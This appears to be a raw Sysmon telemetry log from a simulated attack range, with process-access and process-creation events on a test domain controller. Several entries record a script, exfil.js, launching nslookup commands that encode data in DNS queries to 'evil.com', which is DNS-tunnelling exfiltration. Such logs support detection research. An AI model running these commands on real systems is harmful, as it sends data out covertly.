10341000x8000000000000000215102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.798{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2846-000000005F02}7824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.767{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2746-000000005F02}7588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.767{2E1864BB-18E0-629A-6742-000000005F02}39766148C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-2746-000000005F02}7588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.776{2E1864BB-18FD-629A-2746-000000005F02}7588C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlctsiaw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.752{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxuarmk.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-18FD-629A-2546-000000005F02}63367436C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2646-000000005F02}6028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2646-000000005F02}6028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.720{2E1864BB-18FD-629A-2446-000000005F02}75285776C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-2646-000000005F02}6028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.722{2E1864BB-18FD-629A-2646-000000005F02}6028C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-2446-000000005F02}7528C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxuarmk.tmp 2>&1 10341000x8000000000000000215085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.700{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2546-000000005F02}6336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.700{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-2546-000000005F02}6336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.682{2E1864BB-18FD-629A-2546-000000005F02}63367436C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2446-000000005F02}7528C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.682{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2546-000000005F02}6336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-2446-000000005F02}7528C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-18E0-629A-6742-000000005F02}39765192C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-2446-000000005F02}7528C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.674{2E1864BB-18FD-629A-2446-000000005F02}7528C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsxuarmk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.667{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaqk.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.635{2E1864BB-18FD-629A-2246-000000005F02}77043308C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-2346-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.635{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 